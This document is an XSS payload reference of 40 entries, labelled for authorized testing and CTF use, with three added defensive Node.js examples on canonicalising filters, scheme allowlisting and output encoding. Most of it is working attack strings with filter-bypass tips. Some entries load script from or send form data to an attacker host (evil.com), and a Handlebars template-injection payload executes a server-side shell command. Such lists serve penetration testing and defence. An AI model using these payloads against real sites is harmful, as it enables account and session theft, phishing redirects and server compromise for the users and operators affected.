xss-payloads

40 XSS payload reference — for authorized testing and CTF use only.


Script tag [Basic]
<script>alert(1)</script>

Script src [Basic]
<script src=//evil.com/x.js></script>

protocol-relative URL, loads over whatever scheme the page uses

IMG onerror [Basic]
<img src=x onerror=alert(1)>

SVG onload [Basic]
<svg onload=alert(1)>

Body onload [Basic]
<body onload=alert(1)>

Input autofocus [Basic]
<input autofocus onfocus=alert(1)>

fires without user interaction

Iframe srcdoc [Basic]
<iframe srcdoc="<script>alert(1)</script>">

Details/summary [Basic]
<details open ontoggle=alert(1)>

ontoggle fires when the element opens, no interaction needed
Case variation [Filter Bypass]
<ScRiPt>alert(1)</sCrIpT>

tag and attribute names are case-insensitive in HTML; beats case-sensitive blocklists

Null byte [Filter Bypass]
<scr\x00ipt>alert(1)</script>

null byte between chars: \x00 stands for a literal 0x00 byte, which is non-printing and did not survive copying; the position shown is one example. Aimed at server-side filters and older parsers that truncate or skip at NUL; current browsers replace a NUL inside a tag name with U+FFFD, so confirm in the target browser

Encoded angle [Filter Bypass]
%3Cscript%3Ealert(1)%3C/script%3E

URL encoded: passes a check on the raw request, lands as <script> once the application decodes the parameter

HTML entity script [Filter Bypass]
&lt;script&gt;alert(1)&lt;/script&gt;

in unescaped context: only useful where the value is HTML-decoded before it reaches the DOM, e.g. read from an attribute by JS and written to innerHTML, or unescaped by the backend on output

Double encoding [Filter Bypass]
%253Cscript%253Ealert(1)%253C/script%253E

%25 is an encoded %; survives one decode (WAF, proxy) and becomes <script> on the second (application)

SVG href [Filter Bypass]
<svg><a href="javascript:alert(1)"><text>click</text></a></svg>

needs a click; SVG <a> is often missed by filters that only know HTML <a>

Fromcharcode [Filter Bypass]
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

builds the string alert(1) from char codes, so neither quotes nor the word alert appear in the payload

Backtick template [Filter Bypass]
<script>alert`1`</script>

tagged template call, no parentheses

No parentheses alert [Filter Bypass]
<script>onerror=alert;throw 1</script>

sets alert as the global error handler, then throws; the uncaught exception calls alert with the error message

Newline in tag [Filter Bypass]
<img src=x\nonerror=alert(1)>

\n stands for a literal newline (0x0A) in place of the space, lost in copying; any of tab, LF, FF, CR or space separates attributes, which beats filters keying on "space + on"
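Why the encoding, case and NUL tricks above get past a filter that inspects raw input, and the ordering that closes the gap. This is an added example, not part of the payload list; it assumes Node.js, and naiveFilter is a deliberately simplistic stand-in for a blocklist, not any real WAF rule.

```javascript
// Added example, not part of the payload list. Assumes Node.js.
// naiveFilter is a constructed stand-in for a blocklist, not a real WAF rule.

// Naive blocklist: looks for the literal, lowercase "<script" in the raw
// string. Returns true when the input is allowed through.
function naiveFilter(raw) {
  return !raw.includes('<script');
}

// Turn a numeric entity into a character, leaving impossible code points alone.
function cpToChar(cp, original) {
  return cp <= 0x10ffff ? String.fromCodePoint(cp) : original;
}

// Decode one layer of percent-encoding plus the HTML entities used above,
// and repeat until the string stops changing (this is what handles %2553).
function decodeLayers(input, maxRounds = 5) {
  let current = String(input);
  for (let round = 0; round < maxRounds; round++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch {
      next = current;                  // malformed %xx: leave as-is
    }
    next = next
      .replace(/&#x([0-9a-f]+);/gi, (m, hex) => cpToChar(parseInt(hex, 16), m))
      .replace(/&#(\d+);/g, (m, dec) => cpToChar(Number(dec), m))
      .replace(/&lt;/gi, '<')
      .replace(/&gt;/gi, '>')
      .replace(/&quot;/gi, '"')
      .replace(/&amp;/gi, '&');        // last, so &amp;lt; takes another round
    if (next === current) break;
    current = next;
  }
  return current;
}

// Canonicalise before matching: decode all layers, drop NUL bytes, lowercase.
// Same rule as naiveFilter, now applied to what the browser (or the next
// decoding hop) will actually see.
function robustFilter(raw) {
  const canonical = decodeLayers(raw).replace(/\0/g, '').toLowerCase();
  return !canonical.includes('<script');
}

// Constructed probes mirroring the Filter Bypass entries above; "\0" is a
// literal NUL byte.
const PROBES = [
  '<script>alert(1)</script>',
  '<ScRiPt>alert(1)</sCrIpT>',
  '<scr\0ipt>alert(1)</script>',
  '%3Cscript%3Ealert(1)%3C/script%3E',
  '%253Cscript%253Ealert(1)%253C/script%253E',
  '&lt;script&gt;alert(1)&lt;/script&gt;',
];

// Probes that the naive filter lets through but the robust one stops.
function bypassesNaive() {
  return PROBES.filter((p) => naiveFilter(p) && !robustFilter(p));
}

for (const p of PROBES) {
  console.log(JSON.stringify(p),
              'naive:', naiveFilter(p) ? 'pass' : 'block',
              'robust:', robustFilter(p) ? 'pass' : 'block');
}
```

The point is the order of operations: decode to a fixpoint (bounded, so a pathological input cannot spin), strip what the downstream parser ignores, normalise case, and only then match. Output encoding at the sink is still the real fix; a blocklist like this is at best a detection signal.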
onmouseover [Event Handler]
<div onmouseover=alert(1)>hover me</div>

onclick [Event Handler]
<button onclick=alert(1)>click me</button>

onkeyup [Event Handler]
<input onkeyup=alert(1)>

oncopy [Event Handler]
<p oncopy=alert(1)>copy this</p>

onpaste [Event Handler]
<input onpaste=alert(1)>

onwheel [Event Handler]
<div onwheel=alert(1)>scroll</div>

ondrag [Event Handler]
<div draggable ondragstart=alert(1)>drag me</div>

all of the above need user interaction; for a proof of concept pair them with text or layout that invites the action
Hash-based [DOM-Based]
#<script>alert(1)</script>

in URL hash, e.g. document.write(location.hash). The fragment never reaches the server, so server-side logs and filters do not see it. Browsers percent-encode <, > and " in location.hash per the URL standard, so check whether the sink decodes it (e.g. decodeURIComponent) before relying on this

innerHTML sink [DOM-Based]
"><img src=x onerror=alert(1)>

breaks out of an attribute in the string being assigned to innerHTML, then adds an element whose handler fires; a <script> inserted through innerHTML does not execute, hence the img/onerror form

document.write [DOM-Based]
</script><script>alert(1)</script>

breaks script context: closes the inline script the data was written into and starts a new one

javascript: URI [DOM-Based]
javascript:alert(1)

href/src/location attribute injection; the scheme is matched case-insensitively and browsers ignore leading whitespace and embedded tab/newline, which is why prefix checks on the raw string fail

data: URI [DOM-Based]
data:text/html,<script>alert(1)</script>

modern browsers block top-level navigation to data: URLs; still useful as an iframe src or object data
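The right way to validate a value headed for an href/src/location sink, beside the prefix check that the javascript: and data: entries above defeat. This is an added example, not part of the payload list; it assumes Node.js, whose URL class implements the WHATWG URL parser that browsers also follow, and BASE is a placeholder origin.

```javascript
// Added example, not part of the payload list. Assumes Node.js (WHATWG URL
// parser). BASE is a placeholder origin used to resolve relative links.
const BASE = 'https://app.example/';

// Tempting but wrong: a raw prefix test. Browsers accept a mixed-case scheme,
// strip leading whitespace/control characters, and drop tab and newline
// anywhere in the URL, so all of those slip past this. Returns true = allowed.
function prefixCheck(link) {
  return !link.startsWith('javascript:') && !link.startsWith('data:');
}

// Correct: parse first, then allowlist the normalised scheme. The parser
// lowercases the scheme and applies the same stripping the browser would.
// With requireSameOrigin the link must also resolve to BASE's origin, which
// additionally stops protocol-relative //evil.com/x.js style links.
function isSafeLink(link, requireSameOrigin = false) {
  let url;
  try {
    url = new URL(String(link), BASE);
  } catch {
    return false;                       // unparseable: reject
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return false;
  return !requireSameOrigin || url.origin === new URL(BASE).origin;
}

// Constructed probes: the javascript:/data: forms above plus the case and
// whitespace variants the polyglots rely on.
const PROBES = [
  'javascript:alert(1)',
  'JaVaScRiPt:alert(1)',
  '\tjavascript:alert(1)',
  'java\nscript:alert(1)',
  'data:text/html,<script>alert(1)</script>',
  '//evil.com/x.js',
  '/dashboard?tab=1',
  'https://app.example/home',
];

// One row per probe showing what each check decides.
function report() {
  return PROBES.map((p) => ({
    link: JSON.stringify(p),
    prefixCheck: prefixCheck(p),
    isSafeLink: isSafeLink(p),
    sameOrigin: isSafeLink(p, true),
  }));
}

console.table(report());
```

Note that a scheme allowlist alone still lets //evil.com/x.js through as https://evil.com/x.js; whether that is acceptable depends on the sink (a user-profile link, fine; a script src, not), which is what the requireSameOrigin switch is for.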
Angular (old) [Template Injection]
{{constructor.constructor('alert(1)')()}}

AngularJS 1.x sandbox escape for early 1.x releases; later 1.x versions need version-specific bypasses. Runs when the injected text lands inside an ng-app scope

Vue.js [Template Injection]
{{_c.constructor('alert(1)')()}}

Vue 2 template context: _c is in scope there and its constructor is Function

React dangerousHTML [Template Injection]
{"__html":"<img src=x onerror=alert(1)>"}

dangerouslySetInnerHTML value; this is innerHTML underneath, so <script> is inert and an event handler is used

Handlebars [Template Injection]
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return require('child_process').exec('id');"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}

RCE via SSTI in Handlebars: server-side, not XSS. Applies only when user input is compiled as a template on a Node backend; the quoted string is the command, here id

0xsobky polyglot [Polyglot]
jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>>

the "Ultimate XSS polyglot" from 0xsobky's HackVault; fires as a javascript: URI, as an event handler inside a tag, or after closing style, title, textarea, script and comment contexts

XSS polyglot 2 [Polyglot]
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>

covers attribute, text and script contexts in one string; useful as a first probe, then cut it down to the part that fired
Link injection [HTML Injection]
<a href="javascript:alert(1)">click</a>

needs a click

Meta redirect [HTML Injection]
<meta http-equiv="refresh" content="0; url=https://evil.com">

redirects without JavaScript, e.g. to a phishing page

Base tag hijack [HTML Injection]
<base href="https://evil.com">

hijacks relative URLs (scripts, images, form actions) resolved after it; a CSP base-uri directive blocks this

Form action [HTML Injection]
<form action="https://evil.com"><input type=submit></form>

a submitted form posts its fields to the attacker; a CSP form-action directive restricts where forms may submit
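What actually stops the Basic, Event Handler and HTML Injection payloads at the sink: output encoding chosen per HTML context. This is an added example, not part of the payload list; it assumes Node.js, and the render() template and the sample values are constructed for it.

```javascript
// Added example, not part of the payload list. Assumes Node.js; the
// render() template and the sample payloads below are constructed here.

const HTML_TEXT_MAP = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

// HTML text context (between tags): entity-escape the characters that can
// start markup. '&' must be handled too, or an attacker can smuggle entities.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (c) => HTML_TEXT_MAP[c]);
}

// Attribute value context: escape everything except [A-Za-z0-9] so the value
// can neither close a quoted attribute nor add a new one (such as onerror=)
// even if the template author forgot the quotes.
function escapeAttr(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu,
    (c) => '&#x' + c.codePointAt(0).toString(16) + ';');
}

// Constructed template: comment body in text context, avatar URL in an
// attribute context. Escaping does not validate the URL scheme; a
// javascript: value in src/href needs the separate scheme check.
function render(comment, avatarUrl) {
  return '<p class="comment">' + escapeHtml(comment) + '</p>' +
         '<img src="' + escapeAttr(avatarUrl) + '" alt="avatar">';
}

function count(html, ch) {
  return html.split(ch).length - 1;
}

// What the template contributes on its own: 3 tag openers, 6 quotes.
const TEMPLATE_TAGS = count(render('', ''), '<');
const TEMPLATE_QUOTES = count(render('', ''), '"');

// True if every payload comes out inert: no extra tag opener and no extra
// quote, so no new element, attribute or handler can have been introduced.
function allNeutralised(payloads) {
  return payloads.every((p) => {
    const out = render(p, p);
    return count(out, '<') === TEMPLATE_TAGS && count(out, '"') === TEMPLATE_QUOTES;
  });
}

// Constructed sample drawn from the categories above.
const SAMPLE_PAYLOADS = [
  '<script>alert(1)</script>',
  '<img src=x onerror=alert(1)>',
  '"><img src=x onerror=alert(1)>',
  "' onmouseover=alert(1) x='",
  '<base href="https://evil.com">',
  '<meta http-equiv="refresh" content="0; url=https://evil.com">',
  '<form action="https://evil.com"><input type=submit></form>',
  '&lt;script&gt;alert(1)&lt;/script&gt;',
];

console.log(allNeutralised(SAMPLE_PAYLOADS) ? 'all inert' : 'something leaked');
```

Encoding is per context: the text escaper is not enough inside an attribute, neither is enough inside a script block or a URL, and nothing here helps once data reaches innerHTML or document.write on the client, where the DOM-Based entries apply. Treat CSP (base-uri, form-action, script-src) as the second layer, not a substitute.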
